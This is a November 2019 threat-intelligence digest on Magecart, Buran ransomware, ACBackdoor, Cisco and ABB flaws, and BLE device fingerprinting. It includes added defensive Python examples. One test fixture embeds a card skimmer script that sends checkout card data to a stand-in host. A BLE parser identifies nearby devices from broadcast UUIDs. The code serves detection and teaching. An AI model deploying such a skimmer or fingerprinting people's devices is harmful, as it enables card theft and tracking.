Cyware Daily Threat Intelligence, November 19, 2019

Magecart attacks remain one of the key threats to e-commerce websites. In a new breach notification, the US retail giant Macy's has revealed that it fell victim to a Magecart attack on October 7, 2019. The attackers targeted the shopping cart features 'Checkout' and 'My Wallet' to collect customers' personal and payment card details.

A new backdoor for Windows and Linux, dubbed ACBackdoor, has been discovered in the past 24 hours. It provides arbitrary execution of shell commands, arbitrary binary execution, and update capabilities. The Windows version is delivered via the Fallout exploit kit.

In a major security update reported in the past 24 hours, Cisco has patched a total of 19 vulnerabilities in its SPA100 Series VoIP adapters. The flaws could allow attackers to completely compromise the adapter's web interface as well as the underlying operating system.

Top Breaches Reported in the Last 24 Hours

Macys.com suffers a Magecart attack
Macys.com has disclosed a Magecart attack that occurred early last month. The attackers injected malicious script into the 'Checkout' and 'My Wallet' pages of the site to steal shoppers' personal information and credit card details. The company detected the hack on October 15, 2019.
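A Magecart injection of the kind described above leaves a trace that is easy to check for: script tags on the checkout page that were not there before. The following is an added example, not Macy's or Cyware's code, of a baseline check that parses a page's script tags, flags external scripts loaded from hosts outside an allowlist, and flags inline scripts whose hash does not match one seen on a known-good copy of the page. The allowlist, the clean page and the skimmer snippet are constructed for the demonstration.

```python
"""Baseline check for unexpected <script> tags on a checkout page.

Added example, not Macy's or Cyware's code. The allowlist, the clean page and
the 'skimmed' page are constructed for the demonstration.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: every host the checkout page is expected to load script from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []  # values of <script src=...>
        self.inline = []    # bodies of <script> ... </script>
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf).strip())


def _sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def baseline_inline_hashes(html):
    """Hashes of the inline scripts on a known-good copy of the page."""
    collector = ScriptCollector()
    collector.feed(html)
    return {_sha256(body) for body in collector.inline}


def audit_scripts(html, allowed_hosts, baseline_hashes):
    """Return a list of (finding, detail) for scripts not covered by the baseline.

    External scripts are judged by host (relative URLs are first-party and
    allowed); inline scripts must hash-match one seen on the clean page.
    """
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append(("unexpected-external-script", src))
    for body in collector.inline:
        if _sha256(body) not in baseline_hashes:
            findings.append(("unexpected-inline-script", body[:60]))
    return findings


# Constructed known-good checkout page.
CLEAN_PAGE = """<html><body>
<form id="checkout"><input name="cc"></form>
<script src="//cdn.example/checkout.js"></script>
<script>window.checkoutReady = true;</script>
</body></html>"""

# Constructed copy of the same page with a skimmer injected: one extra external
# script from a look-alike host (reserved .invalid TLD) and one inline hook that
# exfiltrates the card field on submit.
SKIMMED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="https://cdn-example.invalid/c.js"></script>\n'
    "<script>document.getElementById('checkout').addEventListener('submit',"
    "function(){new Image().src='https://cdn-example.invalid/l?d='+"
    "encodeURIComponent(document.querySelector('[name=cc]').value);});</script>\n</body>",
)

if __name__ == "__main__":
    baseline = baseline_inline_hashes(CLEAN_PAGE)
    print(audit_scripts(CLEAN_PAGE, ALLOWED_SCRIPT_HOSTS, baseline))    # []
    print(audit_scripts(SKIMMED_PAGE, ALLOWED_SCRIPT_HOSTS, baseline))  # two findings
```

Run against a fetched copy of the live page on a schedule, the same check catches both the usual Magecart pattern (a script from a look-alike CDN host) and an inline payload, without relying on the skimmer's code being recognizable. A Content-Security-Policy with the same host allowlist blocks the external variant in the browser; the inline variant still needs a hash or nonce policy.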

UNC School reports a breach
UNC-Chapel Hill School of Medicine has disclosed a potential data breach that took place in mid-2018. Over a period of roughly a month, the incident exposed the protected health information of 3,716 patients. The compromised data included names, birth dates, demographic details, contact information, health insurance information, and credit card details.

Louisiana government attacked
Louisiana state government computers have suffered a ransomware attack that took the servers and workstations of many state agencies offline. The government is working to restore the systems as quickly as possible.

Liver Wellness targeted in phishing
Liver Wellness, a medical testing company in Dublin, has reported a phishing incident in which attackers gained access to the company's email system and used it to send phishing messages to patients. It is still unclear how the attackers obtained unauthorized access to the email account.

Top Malware Reported in the Last 24 Hours

Buran ransomware returns
A new spam campaign distributing the Buran ransomware has been spotted. The ransomware spreads through IQY file attachments. When opened, these Microsoft Excel Web Query files make Excel fetch content from a remote URL, and that content triggers a command that installs the ransomware on the victim's computer. The spoofed email is made to look like a simple forward of a previous message and tells the recipient to 'Print document in attach'.
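An IQY file is plain text, so a mail gateway can triage it without opening Excel. The following is an added example, not code from the Buran campaign or from Cyware, that parses the web-query layout (query type, version, URL, optional settings) and gives a verdict based on whether the URL points at a host that legitimately serves web queries. The trusted-host list and both sample attachments are constructed; the lure URL uses a reserved TEST-NET address.

```python
"""Triage an Excel Web Query (.iqy) mail attachment.

Added example, not code from the Buran campaign or Cyware. The trusted-host
list and the two sample attachments are constructed.
"""
from urllib.parse import urlparse

# Constructed allowlist: internal hosts that legitimately serve Excel web queries.
TRUSTED_QUERY_HOSTS = {"reports.corp.example"}


def parse_iqy(data: bytes):
    """Return (url, options) if data is a web-query (.iqy) file, else None.

    Layout as Excel writes it: line 1 the query type ("WEB"), line 2 a version
    number, line 3 the URL Excel fetches when the workbook opens, line 4 optional
    POST parameters, then Key=Value settings.
    """
    lines = data.decode("utf-8-sig", errors="replace").splitlines()
    if len(lines) < 3 or lines[0].strip().upper() != "WEB" or not lines[1].strip().isdigit():
        return None
    url = lines[2].strip()
    options = {}
    for line in lines[3:]:
        key, sep, value = line.partition("=")
        if sep:
            options[key.strip()] = value.strip()
    return url, options


def triage_attachment(filename: str, data: bytes) -> str:
    """Verdict for one attachment: not-iqy, iqy-extension-unparseable,
    iqy-trusted-host or iqy-untrusted-host.

    The content is parsed regardless of the name, so a web query hidden behind
    another extension is still classified; a .iqy name whose content does not
    parse is flagged separately because Excel will still try to open it.
    """
    parsed = parse_iqy(data)
    if parsed is None:
        return "iqy-extension-unparseable" if filename.lower().endswith(".iqy") else "not-iqy"
    url, _options = parsed
    host = (urlparse(url).hostname or "").lower()
    return "iqy-trusted-host" if host in TRUSTED_QUERY_HOSTS else "iqy-untrusted-host"


# Constructed lure in the style of the campaign's "Print document in attach" mail:
# a bare WEB query pointing at an attacker-controlled address (TEST-NET-3 range).
LURE_IQY = b"WEB\r\n1\r\nhttp://203.0.113.5/1.iqy\r\n\r\n"

# Constructed legitimate query that refreshes a report from an internal server.
REPORT_IQY = (
    b"WEB\r\n1\r\nhttps://reports.corp.example/sales.aspx\r\n\r\n"
    b"Selection=AllTables\r\nFormatting=None\r\nPreFormattedTextToColumns=True\r\n"
)

if __name__ == "__main__":
    for name, blob in (("Print_Document.iqy", LURE_IQY), ("sales.iqy", REPORT_IQY)):
        print(name, "->", triage_attachment(name, blob))
```

In most organizations no external web queries are expected at all, so the practical gateway policy is to quarantine every .iqy attachment whose URL host is not on the internal list; the parser above also exposes the URL for blocking at the proxy.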

ACBackdoor malware
Researchers have discovered a new multi-platform backdoor that infects Windows and Linux systems. The malware, dubbed ACBackdoor, provides arbitrary execution of shell commands, arbitrary binary execution, and update capabilities. The Windows version is pushed through malvertising with the help of the Fallout exploit kit. It is not yet known how the malware is dropped on Linux systems.

Top Vulnerabilities Reported in the Last 24 Hours

Google addresses an XSS flaw
Google has fixed an XSS vulnerability in the AMP4Email feature of Gmail. AMP4Email was rolled out in July 2019 to let dynamic content, such as comment threads or event invitations, appear inside emails.

Vulnerable WHfB
The lack of official documentation on Windows Hello for Business (WHfB) led researchers to investigate its internals, uncovering an Active Directory backdoor technique and three other attack vectors that could lead to privilege escalation. One of the three has already been fixed and the other two are currently under review.

Faulty VoIP adapters
A total of 19 vulnerabilities have been detected in VoIP adapters from Cisco's SPA100 Series. If exploited, they could allow an attacker to eavesdrop on a user's conversations, initiate fraudulent phone calls, and pivot further into the internal network. Cisco has addressed the flaws in firmware release 1.4.1 SR5 for the SPA100 Series devices.

Flawed ABB products
CISA has published an advisory on an authentication bypass vulnerability affecting ABB's Power Generation Information Manager (PGIM) plant historian and data analysis tool. The flaw also affects Plant Connect. The affected products are used worldwide across a wide range of sectors including dams, critical manufacturing, energy, water and wastewater, food and agriculture, and the chemical industry. The flaw is tracked as CVE-2019-18250.

Vulnerable Bluetooth devices
Mobile apps that pair with Bluetooth Low Energy devices such as fitness trackers, smart thermostats, smart speakers and smart home assistants share a design weakness that makes the devices easy to identify. A BLE device advertises the UUIDs of the services it offers, and the companion app, which has the same UUIDs embedded in its code, uses them to recognize the device. Because the UUIDs are broadcast in the clear and are specific to a product, anyone scanning nearby can use them to fingerprint which devices are present.
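The fingerprinting described above needs nothing more than the advertising data every BLE scanner already receives. The following is an added example, not code from the research the page refers to, that parses the length/type/data structures of a BLE advertisement, extracts the 16-bit and 128-bit service UUIDs and the device name, and matches the UUIDs against a table of the kind an attacker would build from companion apps. The advertisement bytes and the table are constructed; 0x180D is the Bluetooth SIG-assigned Heart Rate service, and the 128-bit UUID and product names are made up.

```python
"""Parse BLE advertising data and fingerprint a device from the service UUIDs it
broadcasts.

Added example, not code from the research the page refers to. The
advertisement bytes and the UUID-to-product table are constructed; 0x180D is
the Bluetooth SIG-assigned Heart Rate service, the 128-bit UUID is made up.
"""
import struct
import uuid

# AD types from the Bluetooth Core Specification (Generic Access Profile).
AD_FLAGS = 0x01
AD_UUID16_INCOMPLETE, AD_UUID16_COMPLETE = 0x02, 0x03
AD_UUID128_INCOMPLETE, AD_UUID128_COMPLETE = 0x06, 0x07
AD_NAME_SHORT, AD_NAME_COMPLETE = 0x08, 0x09

# Constructed fingerprint table: UUIDs lifted from companion apps -> product.
KNOWN_APP_UUIDS = {
    "180d": "generic heart-rate sensor (SIG-assigned service)",
    "12345678-1234-5678-1234-56789abcdef0": "ExampleCo Fitband (constructed)",
}


def parse_ad_structures(payload: bytes):
    """Yield (ad_type, data) for each [length][type][data...] structure."""
    i = 0
    while i < len(payload):
        length = payload[i]
        if length == 0:          # zero-length padding ends the significant part
            break
        if i + 1 + length > len(payload):
            raise ValueError("truncated AD structure at offset %d" % i)
        yield payload[i + 1], payload[i + 2 : i + 1 + length]
        i += 1 + length


def summarize(adv: bytes, scan_rsp: bytes = b""):
    """Return name, advertised UUIDs and fingerprint matches for one device.

    16-bit UUIDs are little-endian on the air; 128-bit UUIDs are the whole
    16 bytes reversed relative to their textual form.
    """
    name, uuids = None, []
    for ad_type, data in parse_ad_structures(adv + scan_rsp):
        if ad_type in (AD_NAME_SHORT, AD_NAME_COMPLETE):
            name = data.decode("utf-8", errors="replace")
        elif ad_type in (AD_UUID16_INCOMPLETE, AD_UUID16_COMPLETE):
            for off in range(0, len(data) - 1, 2):
                uuids.append("%04x" % struct.unpack_from("<H", data, off)[0])
        elif ad_type in (AD_UUID128_INCOMPLETE, AD_UUID128_COMPLETE):
            for off in range(0, len(data) - 15, 16):
                uuids.append(str(uuid.UUID(bytes=data[off:off + 16][::-1])))
    matches = sorted({KNOWN_APP_UUIDS[u] for u in uuids if u in KNOWN_APP_UUIDS})
    return {"name": name, "uuids": uuids, "matches": matches}


def _ad(ad_type: int, data: bytes) -> bytes:
    """Encode one AD structure; the length byte covers the type byte too."""
    return bytes([len(data) + 1, ad_type]) + data


# Constructed 25-byte advertisement (legacy limit is 31) plus a scan response
# carrying the name, the way a real tracker splits the two packets.
SAMPLE_ADV = (
    _ad(AD_FLAGS, b"\x06")
    + _ad(AD_UUID16_COMPLETE, struct.pack("<H", 0x180D))
    + _ad(AD_UUID128_COMPLETE, uuid.UUID("12345678-1234-5678-1234-56789abcdef0").bytes[::-1])
)
SAMPLE_SCAN_RSP = _ad(AD_NAME_COMPLETE, b"Fitband")

if __name__ == "__main__":
    print(summarize(SAMPLE_ADV, SAMPLE_SCAN_RSP))
```

Feeding this the raw advertising data from a scanning tool is enough to build a list of the products in range; the device name is optional and often absent, which is why the UUIDs rather than the name are what identify the product. The mitigation on the product side is to randomize or obfuscate the advertised UUIDs until a paired app has authenticated, which few devices do.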

Top Scams Reported in the Last 24 Hours

Juice Jacking scam
The Los Angeles County District Attorney's Office has issued a warning about juice jacking. Travelers are advised to avoid public charging stations for their electronic devices, as the ports or supplied cables may have been tampered with. Criminals load malware onto charging stations or cables to infect the phones and other devices of unsuspecting users, which could let them harvest banking details from the infected phone. To avoid falling victim, travelers should carry their own charging cable and power adapter and plug into a wall outlet rather than a public USB port.


Posted on: November 19, 2019
